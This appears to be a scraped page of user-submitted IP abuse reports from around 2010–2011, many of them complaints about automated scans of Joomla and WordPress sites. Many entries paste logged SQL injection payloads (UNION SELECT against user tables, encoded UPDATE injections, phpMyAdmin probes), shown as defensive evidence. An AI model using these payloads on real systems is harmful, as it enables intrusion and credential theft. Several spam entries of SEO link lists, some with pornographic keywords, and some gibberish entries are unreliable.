Very nasty attempts out of Scranton, PA. Please investigate! Getting tired of this! Can someone please investigate? Has happened from all the IP\'s listed below in the last 24 hours. IPs included: ...

Very nasty attempts out of Scranton, PA. Please investigate! Getting tired of this! Can someone please investigate? Has happened from all the IP\'s listed below in the last 24 hours. IPs included: ...

Very nasty attempts out of Scranton, PA. Please investigate! Getting tired of this! Can someone please investigate? Has happened from all the IP\'s listed below in the last 24 hours. IPs included: ...

Very nasty attempts out of Scranton, PA. Please investigate! Getting tired of this! Can someone please investigate? Has happened from all the IP\'s listed below in the last 24 hours. IPs included: ...

There are several SQL Injections IP \'s and all come from the place of \"Scranton Pennsylvania United States\". They scan joomla components in my page....

** Union Select [GET:extid] => 0\'/**/union/**/select/**/0,0x33633273366962,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0/**/from/**/jos_users/**/order/**/by/**/\'b ** Union Select [REQUEST:extid] ...

** Union Select [GET:cat_id] => -9999999/**/union/**/select/**/0,1,2,0x33633273366962,0x33633273366962,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1,2,2,2/**/from/**/jos_users-- ** Union Select [REQUEST:cat_id] =&...

he try hack my site but now have the redirect from other site that is fuckyou.com ** Union Select [GET:id] => -9999999/**/union/**/select/**/0,1,2,3,4,5,6,7,8,0x33633273366962/**/from/**/jos_users...

** Union Select [GET:id] => -1/**/union/**/select/**/0,1,2,0x33633273366962,0x33633273366962,5,6/**/from/**/jos_users-- ** Table name in url [GET:id] => -1 -- 0,1,2,0x33633273366962,0x3363327336...

** Union Select [GET:id] => -99999/**/union/**/select/**/0,0,0x33633273366962,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0x33633273366962/**/from/**/mos_users-- ** Union Select [REQUEST:id] => -99999/**/...

** Union Select [GET:catid] => -1/**/union/**/select/**/1,2,3,4,0x33633273366962,6,7,8,9,10,11/**/from/**/jos_users-- ** Table name in url [GET:catid] => -1 -- 1,2,3,4,0x33633273366962,6,7,8,9,1...

option=com_fantasytournament&Itemid=&func=managersByManager&managerID=-63%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0x33633273366962%2C2%2C3%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- inu...

Similar tactics of the 173.212 folks new ip\'s same hosting company-who is pretty much worthless! Also trying SQL injections- hosting company hostnoc and burstnet both same company...

option=com_datsogallery&func=detail&id=%27%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F1%2C2%2C3%2C4%2C0x33633273366962%2C6%2C7%2C8%2C9%2C0%2C1%2C2%2C3%2C4%2C5%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos...

We have received several recent attempts from same ISP http://www. .com/tl/index2.php?option=com_prayercenter&task=view_request&id=-1/**/union/**/select/**/0,0,0x33633273366962,0,0,0,...

** Union Select [GET:id] => -1/**/union/**/select/**/0,0x33633273366962,0,0,0,0,0/**/from/**/jos_users-- ** Table name in url [GET:id] => -1 -- 0,0x33633273366962,0,0,0,0,0 from jos_users-- ** U...

** Union Select [GET:iid] => -3333/**/union/**/select/**/0,1,2,3,0x33633273366962/**/from/**/jos_users-- ** Table name in url [GET:iid] => -3333 -- 0,1,2,3,0x33633273366962 from jos_users-- ** U...

Repeated attacks from multiple IPs from this ISP. SQL injection attempts. ** Union Select [GET:listid] => 9999999/**/union/**/select/**/0,0x33633273366962/**/from/**/mos_users-- ** Union Select [RE...

Have been receiving continual SQL Injection attacks from IP\'s associated with Burst.net hosting company for the last several days. We have reported to their abuse department but have received no repl...

from this ip, and 96.9.173.48 and some more. I Get errors like this from my site. /index.php?option=com_listoffreeads&AdId=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0x33633273366962%2...

I wish to formally lay a complaint of repeated SQL injection attacks against our business website. IP addresses responsible for the attacks on the various days, occurring during the month of December ...

This guy has been attacking my site for days. The IP always starts with 173.212. These attacks seem well organized, perhaps we can get the ISP to shut the ass down...

** Union Select [GET:PostID] => -9999\\\'/**/union/**/select/**/1,0x33633273366962,3,4,5,6,7/**/from/**/jos_users-- ** Union Select [REQUEST:PostID] => -9999\\\'/**/union/**/select/**/1,0x336332...

I am currently getting attacks from this ip trying to hack our site. ** Union Select [GET:sP] => -1/**/union/**/select/**/1,2,0x33633273366962,4,5,6,7,8,9,10,11,12,13,14,15,16,17/**/from/**/mos_use...

here is the dump of the attempted attack: ** Union Select [GET:id] => -9999999/**/union/**/select/**/0,0,0,1,2,3,0,0,0,0,0,1,1,1,1,1,1,1,1,1,0,0,0x33633273366962/**/from/**/jos_users-- ** Union Se...

Attempting many SQL-Injection Attack to my Website. I had more than 30 attempts during the last 48 hours from this and closely related adresses. ** Union Select [GET:tid] => 1/**/union/**/select/**...

IP Addresses included: 173.212.197.42 173.212.195.136 173.212.195.174 173.212.197.48 173.212.254.6 173.212.195.150 173.212.213.36 173.212.254.44 173.212.195.182 173.212.254.10 173.212.254.12 173.212...

** Union Select [GET:c] => -1/**/union/**/select/**/1,0x33633273366962,3,4,5/**/from/**/jos_users-- ** Union Select [REQUEST:c] => -1/**/union/**/select/**/1,0x33633273366962,3,4,5/**/from/**/jo...

** Union Select [GET:id] => -1/**/union/**/select/**/1,0x33633273366962,3/**/from/**/jos_users-- ** Union Select [REQUEST:id] => -1/**/union/**/select/**/1,0x33633273366962,3/**/from/**/jos_user...

** Union Select [GET:catid] => -2/**/union/**/select/**/0x33633273366962,0x33633273366962,0x33633273366962/**/from/**/jos_users-- ** Union Select [REQUEST:catid] => -2/**/union/**/select/**/0x33...

** Union Select [GET:catid] => -1/**/union/**/select/**/0x33633273366962,2,3/**/from/**/jos_users-- ** Union Select [REQUEST:catid] => -1/**/union/**/select/**/0x33633273366962,2,3/**/from/**/jo...

** Union Select [GET:did] => 9999999999999/**/union/**/select/**/0,0,0x33633273366962,4,5,6,7,8,9,0,0,4,5,0,7,0,9,0,0,0,0,0,0,0/**/from/**/jos_users-- ** Union Select [REQUEST:did] => 9999999999...

** Union Select [GET:idFiliale] => -5/**/union/**/select/**/1,0x33633273366962,3,4,0x33633273366962,6,7,8,9,10,11/**/from/**/jos_users-- ** Union Select [REQUEST:idFiliale] => -5/**/union/**/sel...

Many attacks in the last 24 hours, all from Pennsylvania and this and close to this IP address. Have logs to prove. ** Union Select [GET:aid] => -9988/**/union/**/select/**/0x33633273366962,0,0x3...

Have had over 20 attempts in the last 24 hours from this and other closely related IP addresses. I have the logs to prove it as well. Very much misbehaving. ** Union Select [GET:surano] => -1/**...

These bloody idiots are trying to hack my sites continually!!! ** Union Select [GET:fid] => -1/**/union/**/select/**/0x33633273366962/**/from/**/jos_users-- ** Union Select [REQUEST:fid] => -1/...

*REMOTE_ADDR : 66.197.227.184 *HTTP_USER_AGENT : Mozilla/5.2 (Windows; U; Windows NT 5.2; en-EN) Gecko/20080919 Firefox/3.5.6 *REQUEST_METHOD : GET *QUERY_STRING : option=com_ownbiblio&view=cat...

** Union Select [GET:sid] => -1/**/union/**/select/**/0x33633273366962,1,2,0x33633273366962,4,5,6,7,8,0x33633273366962,0x33633273366962,11/**/from/**/jos_users-- ** Table name in url [GET:sid] =&gt...

** Union Select [GET:categoryId] => -1/**/union/**/select/**/1,2,3,0x33633273366962,5,6,7,8,9,10,11,12/**/from/**/mos_users-- ** Union Select [REQUEST:categoryId] => -1/**/union/**/select/**/1,2...

** Union Select [GET:id] => 369752/**/union/**/select/**/1,0x33633273366962,3,4,5,6,7,8,9,1,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5/**/from/**/jos_users-- ** Table name in url [GET:id] => 369752 -- 1,0x33...

I\'ve been receiving repeated attacks from a list of IP\'s (all related to same ISP) - blocked them and now am getting attacks from this IP. Located in the same town apparently!...

** Union Select [GET:user_id] => -9999999/**/union/**/select/**/0x33633273366962/**/from/**/jos_users-- ** Union Select [REQUEST:user_id] => -9999999/**/union/**/select/**/0x33633273366962/**/fr...

*REMOTE_ADDR : 173.212.195.136 *HTTP_USER_AGENT : Mozilla/5.2 (Windows; U; Windows NT 5.2; en-EN) Gecko/20080919 Firefox/3.5.6 *REQUEST_METHOD : GET *QUERY_STRING : option=com_volunteer&task=j...

i have forwarded their host many of the attacks. I hope they take action soon. IP Address : 173.212.197.10 IP Address : 173.212.254.10 IP Address : 173.212.195.150 IP Address : 173.212.197.42 IP Addre...

I am reporting about multiple attacks which were stopped by my KIS 2011. It was intrusion.win.mssql.worm.helkern. KIS says that it was from 61.178.59.219 thats really annoying...

Another list of the hackers IPs. 173.212.213.38 173.212.213.36 173.212.213.30 173.212.213.20 173.212.195.182 173.212.254.44 173.212.254.6 173.212.195.142 173.212.197.48 173.212.195.136 173....

I have already reported the attacks to the their ISP abuse, if you are experiencing attacks from the same IP addresses below, please email: abuse@hostnoc.net and nic@hostnot.net to report it. These a...

I have already reported the attacks to the their ISP abuse, if you are experiencing attacks from the same IP addresses below, please email: abuse@hostnoc.net and nic@hostnot.net to report it. These a...

I have already reported the attacks to the their ISP abuse, if you are experiencing attacks from the same IP addresses below, please email: abuse@hostnoc.net and nic@hostnot.net to report it. These a...

I have already reported the attacks to the their ISP abuse, if you are experiencing attacks from the same IP addresses below, please email: abuse@hostnoc.net and nic@hostnot.net to report it. These a...

I have already reported the attacks to the their ISP abuse, if you are experiencing attacks from the same IP addresses below, please email: abuse@hostnoc.net and nic@hostnot.net to report it. These a...

I have already reported the attacks to the their ISP abuse, if you are experiencing attacks from the same IP addresses below, please email: abuse@hostnoc.net and nic@hostnot.net to report it. These a...

I have already reported the attacks to the their ISP abuse, if you are experiencing attacks from the same IP addresses below, please email: abuse@hostnoc.net and nic@hostnot.net to report it. These a...

I have already reported the attacks to the their ISP abuse, if you are experiencing attacks from the same IP addresses below, please email: abuse@hostnoc.net and nic@hostnot.net to report it. These a...

I have already reported the attacks to the their ISP abuse, if you are experiencing attacks from the same IP addresses below, please email: abuse@hostnoc.net and nic@hostnot.net to report it. These a...

I have already reported the attacks to the their ISP abuse, if you are experiencing attacks from the same IP addresses below, please email: abuse@hostnoc.net and nic@hostnot.net to report it. These a...

I have already reported the attacks to the their ISP abuse, if you are experiencing attacks from the same IP addresses below, please email: abuse@hostnoc.net and nic@hostnot.net to report it. These a...

I have already reported the attacks to the their ISP abuse, if you are experiencing attacks from the same IP addresses below, please email: abuse@hostnoc.net and nic@hostnot.net to report it. These a...

** Union Select [GET:tagid] => -1)/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,0x33633273366962,12,13,14,15,16,17,18/**/from/**/jos_users-- ** Union Select [REQUEST:tagid] => -1)/**/union/**/sele...

I have already reported the attacks to the their ISP abuse, if you are experiencing attacks from the same IP addresses below, please email: abuse@hostnoc.net and nic@hostnot.net to report it. These a...

I have already reported the attacks to the their ISP abuse, if you are experiencing attacks from the same IP addresses below, please email: abuse@hostnoc.net and nic@hostnot.net to report it. These a...

I have already reported the attacks to the their ISP abuse, if you are experiencing attacks from the same IP addresses below, please email: abuse@hostnoc.net and nic@hostnot.net to report it. These a...

I have already reported the attacks to the their ISP abuse, if you are experiencing attacks from the same IP addresses below, please email: abuse@hostnoc.net and nic@hostnot.net to report it. These a...

Multiple attacks from IP range 173.21.* looking for vulnerability in various joomla 3rd party components ** Union Select [GET:motor] => -1/**/union/**/select/**/1,2,0x33633273366962,4,5,6,7,8,9,10...

Same like bellow. I think they dont have anything better to do, just to try. Hopefully it will stop :) Attack parameters: Type of attack: SQL-Injection Scanner IP adress: 173.212.213.30 ...

Looks like automated scans for known vulnerabilities in 3rd party joomla components. 20 attempted attacks in the last 24 hours against one of our domians. Got the whole adress range blocked now in our...

** Union Select [GET:id] => -999999/**/union/**/select/**/0,0,0x33633273366962,1,2,3,0,0,0,0,0,1,1,1,1,1,1,4,5,6,0x33633273366962/**/from/**/jos_users-- ** Table name in url [GET:id] => -999999 ...

** Union Select [GET:id] => 7/**/union/**/all/**/select/**/0x33633273366962,2,3,4,5,6/**/from/**/jos_users-- ** Table name in url [GET:id] => 7 -- 0x33633273366962,2,3,4,5,6 from jos_users-- ** ...

This ip has attempted multiple sql injections over the past 2 days. Here is a dump of the effort: ** Union Select [GET:category_id] => -1\\\'/**/union/**/select/**/1,2,3,4,0x33633273366962,5,044,07...

I\'m a student who runs this website - eslib.ischool.syr.edu - and have been getting HAMMERED all day by IPs in this range. I keep adding them to my cPanel IP Deny but the attacks keep coming....

This range of sites from 173.212.195 have been attacking my joomla site all day, all of the are now in my blacklist. Other ranges include 173.212.197 173.212.254 ...

** Union Select [GET:catid] => -999/**/union/**/select/**/2,2,3,0x33633273366962,5/**/from/**/mos_users-- ** Union Select [REQUEST:catid] => -999/**/union/**/select/**/2,2,3,0x33633273366962,5/*...

** Union Select [GET:listid] => 9999999/**/union/**/select/**/0,0x33633273366962/**/from/**/mos_users-- ** Union Select [REQUEST:listid] => 9999999/**/union/**/select/**/0,0x33633273366962/**/fr...

** Union Select [GET:id] => -1/**/union/**/select/**/0,0x33633273366962,0,0,0,0,0/**/from/**/jos_users-- ** Union Select [REQUEST:id] => -1/**/union/**/select/**/0,0x33633273366962,0,0,0,0,0/**/...

De last day about 20 reports from de website steengoedbeheer.com of witch I am webmaster. Attention on 7 December 2011 there was an attempt to break your website. jFireWall successfully blocked the h...

This IP and its range keeps trying to SQL Inject and port scan for 3 days now. Needs to be investigated as soon as possible....

8:25:07 PM Block IN TCP 82.137.8.95 18752 86.127.74.46 1433 SYN Blocked by the Attack Detecton component IP Address: 82.137.8.95 IP Address Country: Romania (RO) IP Address Region: 36 Timis IP Addre...

4 SQl Injection attempts from this IP and 6 more from two others: 172.212.213.20 and 173.212.213.30... all happened within twenty four hrs of each other....

Repeated SQL Injection Attempts over a 24 hr period 12/6-12/7. At least 2 attempts from this IP and another 8 from 173.212.213.20 and 173.212.213.38....

Repeated SQL Injection Attempts over a 24 hr period 12/6-12/7. At least 4 attempts from this IP and another 6 from 173.212.213.30 and 173.212.213.38....

Not sure what category to submit this in, however, this attack alerted by Kaspersky Labs is being given daily, repeated times a day. Thank you for investigating this attack. It is detected to be comin...

Hi, we\'re Unlead the hosting provider of protecsrl.it website. Few minutes ago the webmaster of webdesignatz.com has putted his link on the top menu of our client, fortnually our servers are protecte...

IP Address: 86.127.149.11 IP Address Country: Romania (RO) IP Address Region: 38 Vaslui IP Address City: Vaslui IP Postal Code IP Address Area Code 0 IP Metro Code 0 IP Address Latitude: 46.63330078...

219.148.155.62 - - [01/Dec/2011:19:42:14 +0100] \"GET //phpmyadmin/ HTTP/1.1\" 200 9708 \"-\" \"Made by ZmEu @ WhiteHat Team - www.whitehat.ro\" 219.148.155.62 - - [01/De...

This IP is bad, try to make SGL Injection to my opera. detected by my antivirus Program. I shall revenge this.....or swear that the person who do this, go to hell...

I\'ve been witnessing many SQL injections as well as, in-addr.arpa or ARP attacks, (man in the middle), this is only one of many address\'s fully identified doing this....

He tried to intrude.......but firewall blocked... I\'m Kaspersky 2012 Internet Security user.... \"Detected: Intrusion.Win.MSSQL.worm.Helkern UDP from 219.148.1.91 to local port 1434\" Is th...

Another douchebag hacker from some part of the world that no one cares about is trying to hack webpages. WordPress Firewall has detected and blocked a potential attack! Warning: URL may contain dange...

Another douchebag hacker from some part of the world that no one cares about is trying to hack webpages. WordPress Firewall has detected and blocked a potential attack! Warning: URL may contain dange...

WordPress Firewall has detected and blocked a potential attack! Warning: URL may contain dangerous content! Offending IP: 89.229.59.245 [ Get IP location ] There seems to be a lot of these going aro...

WordPress Firewall has detected and blocked a potential attack! Warning: URL may contain dangerous content! Offending IP: 109.157.85.220 [ Get IP location ] Got that message today about 50 times. H...

Got this today.in my email - have a few others as well. Warning: URL may contain dangerous content! Offending IP: 108.88.132.214 This may be a \"WordPress-Specific SQL Injection Attack ...

SLAMMER WORM ATTACK ON PORT 1433 FROM THIS ASSHOLE FROM VASLUI IP Address: 86.127.131.32 IP Address Country: Romania (RO) IP Address Region: 38 Vaslui IP Address City: Vaslui IP Postal Code IP Addre...

Here is a sample : GET /showthread.php?t=97163+AND+1=2-- HTTP/1.1 Accept-Encoding: identity Host: forums.namcobandaigames.eu Connection: close User-Agent: Python-urllib/2.5 We have received this atta...

The IP address is trying to inject malicious SQL code in the web site www.igepn.edu.ec since November 17th, 2011 on a continuos basis. ...

I have complained to the ISP twice before and it has not seemed to do anything further - will be reporting them to the police....

My system is been attacked by one Chinese ip UDP from 219.148.1.91 to local port 1434 ,several times on 14-11-2011 , My Kaspersky Internet Security 2012 denied the intrusion ,Which is network attack b...

Ja ja nein ja ja ja ja ja ja aj ja. Ajajaj aj keo smi dnri sksoen djdks oh ma mein dein unser ...

Trying to hack webpage that uses wordpress. Maybe some new security hole in wordpress. TimThumb Remote Code Execution Vulnerability Exploit attempt. He had many attempts so far. ...

Signature Name: MSSQL Resolution Service Stack Overflow Attacker: 70.85.140.250:2619 ==> Victim xxx.xxx.xxx.xxx:1434 Signature ID: 4703 Sub-Signature ID: 0 Please consult the Cisco Security ...

This IP address is trying to access my SQL Server constantly. I never allow it, nevertheless it keep connecting to my SQL. This is really annoying....

This IP tried to enter files on servers like \"/wp-login.php\" .. my SQL gave an error had to repair .. BANED IP ip has tryed 3 times in last hour ...

I´ve received two intrusions attempts (at 08h01min and at 20h15min) from IP 212.104.84.94. My antivirus has blocked the attack and have indentified as \"Intrusion.Win.MSSQL.worm.Helk...

this ip adres try to hack our SQL Server in the Netherlands without our permissions and he try to do that this day (10/29/2011) about 10:00 until now...

This IP has visited my site for a few months now. 32 Visits to my site in United States, electrical firm. This IP is hacking and probing ports on my server and attempting to hack. This IP is posting o...

Keep on getting SEP reports of attempted attacks from this IP address. Not sure what else to write, strange requirement. More words to make the min 25....

10/27/2011 13:24:59.592 Alert Intrusion Prevention IPS Prevention Alert: VIRUS SQL Slammer Activity, SID: 1870, Priority: Medium 70.85.140.250, 2619, X1, fa.8c.5546.static.theplanet.com xxx.xx.x.xx, 1...

188.143.232.204 we found intrusion attempts each hour in apache logs They use fake email to post in our formulaire in other page We suggeste block all request from this IP ...

ert Intrusion Prevention IPS Prevention Alert: VIRUS SQL Slammer Activity, SID: 1870, Priority: Medium 219.148.1.91, 1800, X1 xxx.xx.x.xx, 1434, Xx ert Intrusion Prevention IPS Prevention Alert: VIRU...

0/23/2011 17:38:54.704 Alert Intrusion Prevention IPS Prevention Alert: VIRUS SQL Slammer Activity, SID: 1870, Priority: Medium 70.85.140.250, 2619, X1, fa.8c.5546.static.theplanet.com xxx.xx.x.xx, 14...

Date: 23.10.2011 Time: 23:34:38 GMT+4 Detected: Intrusion.Win.MSSQL.worm.Helkern Absent UDP from 219.148.1.91 to local port 1434 said my Kaspersky just now. First time occured, I never had been attac...

IPS Prevention Alert: VIRUS SQL Slammer Activity, SID: 1870, Priority: Medium 70.85.140.250, 2619, X1, fa.8c.5546.static.theplanet.com IPS Prevention Alert: VIRUS SQL Slammer Activity, SID: 1870, Pri...

Tried to submit an invalid query to the site outyourbackdoor.com using a know but closed mysql vulnerability. We are now tracking and reporting all complaints [GATEWAY_INTERFACE] => CGI/1.1 [...

10/19/2011 18:19:28.704 Alert Intrusion Prevention IPS Prevention Alert: VIRUS SQL Slammer Activity, SID: 1870, Priority: Medium 61.235.46.146, 3340, Xx xxx.xx.x.xx, 1434, Xx That is all.... Yep yep y...

10/19/2011 22:25:52.448 Alert Intrusion Prevention IPS Prevention Alert: VIRUS SQL Slammer Activity, SID: 1870, Priority: Medium 70.85.140.250, 2619, Xx, fa.8c.5546.static.theplanet.com xxx.xx.x.xx, 1...

Tried SQL injections via get on comment form. Tried to upload 2 images and 1 pdf files. There are numerous other complaints about this ip from lots of other sites. ...

Tried sql injections via get and also sql injections on admin form. There are numerous other complaints about this ip from lots of other sites. ...

Alert Intrusion Prevention IPS Prevention Alert: VIRUS SQL Slammer Activity, SID: 1870, Priority: Medium 219.148.1.91, 2733, X1 ***.**.*.**, 1434, X* Alert Intrusion Prevention IPS Prevention Alert:...

09/28/2011 17:23:53.688 Alert Intrusion Prevention IPS Prevention Alert: VIRUS SQL Slammer Activity, SID: 1870, Priority: Medium 219.148.1.91, 2733, X1 ***.**.*.**, 1434, X3 attack 7 Times... yep yep...

we are a government agency and we are getting SQL injection attacks from this ip address. There are about 100 attacks per minute. Thank you....

09/26/2011 20:29:00.880 Alert Intrusion Prevention IPS Prevention Alert: VIRUS SQL Slammer Activity, SID: 1870, Priority: Medium 219.148.1.91, 2733, X1 ***.**.*.**, 1434, X 09/26/2011 20:29:00.880 Ale...

<?php /** * This program is under GNU GPL license. * * You can contact the author of this program at <ffmandu13@hotmail.com/>. */ //Defined regexps (you can add your own ones). define(...

IPS Prevention Alert: VIRUS SQL Slammer Activity, SID: 1870, Priority: Medium Alert Intrusion Prevention 1305, X1 1434, 4 COUNTS OF THIS ALERT WO0OO ... always something ...

This IP - 61.235.46.146 was trying to hack my computer via Instruction.Win.MSSQL.worm.Helkern. as it showed in my kaspersky warning message. Please help me and look into this very strictly....

02:40:16.080 Alert Intrusion Prevention IPS Prevention Alert: VIRUS SQL Slammer Activity, SID: 1870, Priority: Medium 219.148.1.91, 2733, X1 ***.**.*.**, 1434, X3 Attack count one time .. Priority: Me...

Repeated Sql Injection Attacks from IP 193.105.240.173 Repeated Sql Injection Attacks from IP 193.105.240.173 Repeated Sql Injection Attacks from IP 193.105.240.173 Repeated Sql Injection Attac...

22.09.2011 18:19:05 Обнаружено: Intrusion.Win.MSSQL.worm.Helkern UDP от 94.188.21...

/wp-content/plugins/1-flash-gallery/upload.php?action=uploadify&fileext=php $_FILE = index.bak.php This may be a \"Executable File Upload Attack.\" IP attempt to exploit wordpress inst...

This IP has tried to hack 5 different wordpress sites that I run. The hack attempts are continuing on. Please keep an eye on this IP and block it from your hosts...

This IP and several on the strong of 180.76.5.* have SQL injected my website at the above address. I cannot figure out how to stop it...

hhhhhhhhhhhd wef wef we fwe fwe fewd fdwe fgergergwe weffwsvdsgdf gdergrg wergegegerger ge sdfsfsd ds edg e gr grt ghrth grthgrt rtrt r rth rtdr svasdfwegghtgwsfqwdfwegwewe wgwe gwg wg we ggw ew ge w...

These clowns has been trying to hack my site. If they keep it up, I\'ll be forced to beat some Latvian ass into a thick red paste....

someone from this IP has been trying to hack into my site for a week now. Classified as a \"WordPress-Specific SQL Injection Attack.\" by WP firewall. ...

IP 193.105.240.173 has tried several times to gain access my Wordpress website using SQL Injection. It was classified as \"WordPress-Specific SQL Injection Attack.\" Please do something abou...

Had over a dozen email alerts today of a WordPress-Specific SQL Injection Attack attempts made from this IP to the wp-login for almost all of my Wordpress sites today. Wordpress Firewall blocked them ...

For the last two days we\'ve been receiving repeated SQL injection attacks from this IP address directed at our various Wordpress sites. A quick Google search reveals that this IP is a repeat offender...

This IP 193.105.240.173 tried to hack our site overturnseries.com today. Please do something cause a lot of people are complaining. Our site is a sci-fi web series. We do not have any anti-anybody co...

This IP along with the others below, using multiple different names and addressses like \"the five street new york, ny\" slammed my order form over 400 times with nonsense. 222.186.26.208 2...

9/03/2011 18:09:51.192 Alert Intrusion Prevention IPS Prevention Alert: VIRUS SQL Slammer Activity, SID: 1870, Priority: Medium 212.104.86.94, 3661, X1 *** *** *** , 1434, X3 9/03/2011 18:09:51.192 A...

Kaspersky just picked this up under network attacks. The IP was successfully blocked, but it\'s still a little worrying since I\'ve NEVER had this kind of attack before....

30.08.2011 07:31:17 Gefunden Intrusion.Win.MSSQL.worm.Helkern Netzwerkpaket UDP von 190.215.93.163 auf lokalen Port 1434 Nicht vorhanden 30.08.2011 07:31:17 Gefunden Intrusion.Win.MSSQL.worm.H...

one more time......Found Network attack Intrusion.Win.MSSQL.worm.Helkern 222.32.89.5 Found Network attack Intrusion.Win.MSSQL.worm.Helkern 222.32.89.5 Found Network attack Intrusion.Win.MSSQL.worm.H...

09/02/2011 07:43:46.048 Alert Intrusion Prevention IPS Prevention Alert: VIRUS SQL Slammer Activity, SID: 1870, Priority: Medium 222.32.89.5, 4506, X1 *****.2.*-*, 1434, 09/02/2011 07:43:46.048 Alert ...

incearca sa-mi injecteze virusi in computer o sa pun Politia pe urmele acestu cacat cu ochiIP Address: 86.127.172.66 IP Address Country: Romania (RO) IP Address Region: 12 Caras-Severin IP Address C...

08/29/2011 18:09:52.592 Alert Intrusion Prevention IPS Prevention Alert: VIRUS SQL Slammer Activity, SID: 1870, Priority: Medium 183.167.196.226, 2670, X1 1434, ... 1434, lert Intrusion Prevention IPS...

Intrusion.Win.MSSQL.Worm.Helkern Intrusion.Win.MSSQL.Worm.HelkerIntrusion.Win.MSSQL.Worm.Helkern Intrusion.Win.MSSQL.Worm.HelkerIntrusion.Win.MSSQL.Worm.Helkern Intrusion.Win.MSSQL.Worm.HelkerIntrusio...

Intrusion Prevention IPS Prevention Alert: VIRUS SQL Slammer Activity, SID: 1870, Priority: Medium 61.235.97.52, 61473, X Intrusion Prevention IPS Prevention Alert: VIRUS SQL Slammer Activity, SID: 1...

Hello, I´ve logged some tries from this IP to inject SQL at: www.maktour.com.br, adding these strings to some (get) parameters: /**/And/**/(SELECT/**/1)=1 /**/And/**/(SELECT/**/2)=2 B...

Probleme hack sql injection sur le serveur 68.168.116.6 cela dure depuis un bon moment harcèlement de client utilisation de compte admin non permit Pour toute otre info contacter moi die...

193.105.240.173 has made repeated attempts to hack my wordpress blog. Please investigate them. I\'ve banned the ip, but you can see there is an ongoing problem....

I have had 5 attempts from this IP address to hack via wp-login a simple music band related blog in the UK. Fortunately I have wordpress firewall installed & the attempts have been blocked....

SQL injection attack. PERMANENTLY!!! Attack parameters: Type of attack: SQL-Injection Scanner IP adress: 84.22.62.204 National IP network of ARTMOTION.Net Located in Kosova (SERBIA) Kujtim Hajredini ...

http://integralblinds.com/webalizer/36/jewelry-supplies.html jewelry supplies, =-PP, http://51xbox.com/archiver/159/slime-recipes.html slime recipes, 807027, http://computersalesaldergrove.com/webal...

http://computerservicealdergrove.com/modlogan/29/world-poker-tour.html world poker tour, %-DD, http://onedebt.com/facefiles/777/car-quest.html car quest, %-P, http://barabbotsford.com/cp/272/kid-roc...

http://chilkoriver.com/modlogan/59/math-homework-answers.html math homework answers, zvl, http://yemendirect.com/English/844/gadwin-print-screen.html gadwin print screen, 340986, http://rajendrapras...

http://energywercs.org/images/690/index.html kijiji peterborough, iknnk, http://internetbusinessblogs.info/cp/75/dark-circles-under-eyes.html dark circles under eyes, 8-]]], http://morrison3d.com/Sc...

http://leicesterdigitalmedia.com/images/06/access-dane.html access dane, 2283, http://cnmanufacture.com/webalizer/274/mexican-rice.html mexican rice, 869353, http://computersalesmission.com/_notes/2...

http://overlanderhotel.com/scripts/97/muscatine-journal.html muscatine journal, oerr, http://ozarkwoodcarver.com/wp-admin/671/adobe-reader-repair.html adobe reader repair, 8023, http://polymers-mero...

http://ultrapurenoleadvalves.com/css/80/gay-personals.html gay personals, tob, http://officex6.com/wp-includes/594/anilos-movies.html anilos movies, =-[[, http://integral-blinds.com/webalizer/600/fe...

http://solardid.com/solar-product/501/xxxl-animal-costumes.html xxxl animal costumes, 733, http://zoha.com/index_files/28/female-sock-fetishes.html female sock fetishes, 085493, http://patelinfraene...

http://thewhole9online.com/shoe/004/teen-girl-costume-ideas.html teen girl costume ideas, 5955, http://leschenaultcc.com/oldadmin/541/xxxxxxxxx-dynamic-lights.html xxxxxxxxx dynamic lights, 955, htt...

http://justproducts.biz/flash/06/oral-sex-porn.html oral sex porn, 2680, http://innovativeliftsolutions.com/webalizer/61/nuns-having-sex-porn-xxx.html nuns having sex porn xxx, qdc, http://ufrsports...

this ip continually attacking in my system. Thanks to kspersky that it save my system.. Chinese assholes ...

the code wrote in the address bar is: 1991+update+cartHeader+set+companyName=REPLACE(cast(companyName+as+varchar(8000)),cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar...

GET /phpMyAdmin-2.8.2/scripts/setup.php HTTP/1.1 /sqlmanager/scripts/setup.php HTTP/1.1 /webadmin/scripts/setup.php HTTP/1.1 /phpMyAdmin-2.8.0.3/scripts/setup.php HTTP/1.1 /phpMyAdmin-2.8.0.4/scri...

Details:- HTTP Suspicious Domain Request SQL Injection Attacking Computer: 125.46.73.250, 80 Attacker URL: js.users.51.la/3446609.ja Source Address: 125.46.73.250 Traffic Description: TCP, ww...

16.09.2010 19:53:21 Found: Intrusion.Win.MSSQL.worm.Helkern UDP von 219.149.194.245 at lokal Port 1434...

I want to hook this worm with a chopstick!...

This prick keeps trying to break in every few days or so......

port scanning...

Tried to inject at p 1434...

Payload file on this site http:// js.users.51.la / 4115989 . script Infected DB with all SQL VARCHAR FIELDS UPDATE WITH ABOVE URL...

Payload file on this site...

attempted intrusion.win.mssql.worm.hellkern UDP to local port 1434...

Caught by Cisco router firewall on UDP and TCP ports...

Consistently attacks. Blocked by Symantec Antivirus. Details simply listed as Incoming....

2010-08-17 01:52:21 Upptäckt: Intrusion.Win.MSSQL.worm.Helkern Okänt program UDP från 219.150.223.253 till lokal port 1434 still trying its seems...

2010-08-17 01:52:21 Upptäckt: Intrusion.Win.MSSQL.worm.Helkern Okänt program UDP från 219.150.223.253 till lokal port 1434 still trying its seems...

2010-08-17 01:52:21 Upptäckt: Intrusion.Win.MSSQL.worm.Helkern Okänt program UDP från 219.150.223.253 till lokal port 1434 still trtying its seems...

Date: 08/14 03:38:07 Name: SQL version overflow attempt Priority: 1 Type: Attempted Administrator Privilege Gain IP info: 118.213.78.20:1547 -> ***.***.***.***:1434...

Enters same listings into database with different email addresses ending with such characters like &#826, ? , $,% etc. This results into database being blocked when queries are made....

MS SQL Stack BO 67.170.33.143 aug 2 2010 6:47PM ...

